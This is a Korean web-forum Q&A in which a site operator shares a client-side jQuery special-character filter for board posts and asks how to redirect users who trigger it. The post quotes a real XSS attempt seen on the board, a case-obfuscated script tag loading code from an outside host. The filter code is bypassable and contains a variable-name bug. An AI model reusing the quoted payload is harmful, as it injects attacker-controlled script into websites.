SIR
KCP 창업 지원, 수수료 국내최저 2.9% 제공 이벤트!

게시판 글쓸때 특수문자사용불가 팝업이후 소스

게시판 글쓸때 특수문자사용불가 팝업이후 소스

QA

게시판 글쓸때 특수문자사용불가 팝업이후 소스

본문

현재 write.skin.php 에  처리했습니다

 

//특수문자 사용금지

$(document).ready(function(){

$("#wr_content").on("keyup", function(){//작성자 이면 wr_name으로 내용이면 wr_content 제목이면 wr_subject

reg = /[~!@\/<>#$%^&*\()\-=+_']/gi;

var temp=$(this).val();

if(reg.test(temp)){

alert("특수문자는 입력할 수 없습니다.")

$(this).val(temp.replace(re,""));

}

});

});

 

현재여기까지는 팝업이 잘뜨는데

 

if(reg.test(temp)){

alert("특수문자는 입력할 수 없습니다.");

location.href = "<?php echo G5_URL?>";

return false;
}

 

이렇게설정해도 메인으로 튕겨나가질않네요 팝업만뜨고 다시글쓰면 그냥써져버려서

튕겨내야할거같은데

 튕겨내는 별다른 소스아시는분 계실까요?ㅠ

 
<sCRiPt sRC=//0x.ax/dflh></sCrIpT>
 
이렇게 게시판에 해킹시도글을 시도하는게 눈에보여서요..
이 글을 내 페이스북 계정으로 보내기 이 글을 내 트위터 계정으로 보내기

이 질문에 댓글 쓰기 :

답변 2

채택됨

평정심님의 답변

먼저 return false;를 제거하시고

location.href = "여기값이 제대로 나오는지 확인해 보세요";

주소복사
채택됨
답변의 댓글

파아랑님의 답변

return false 중요한 역활을 합니다.

주소복사
답변의 댓글
답변을 작성하시기 전에 로그인 해주세요.
전체 93,296 | RSS
고마운 분의 도움으로 질문을 해결하셨다면, 채택을 눌러서 감사의 마음을 전하세요.
어떻게 질문해야 할지 모른다면 질문하는 방법을 읽어 보신후 질문해 보세요.
QA 내용 검색

회원로그인

진행중 포인트경매

  1. 참여4 회 시작20.11.23 11:40 종료20.11.28 11:40
  2. 참여9 회 시작20.11.22 19:25 종료20.11.29 13:25

(주)에스아이알소프트 (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 대표메일:admin@sir.kr
사업자등록번호:217-81-36347 대표:홍석명 통신판매업신고번호:2014-서울강남-02098호 개인정보보호책임자:이총

© SIRSOFT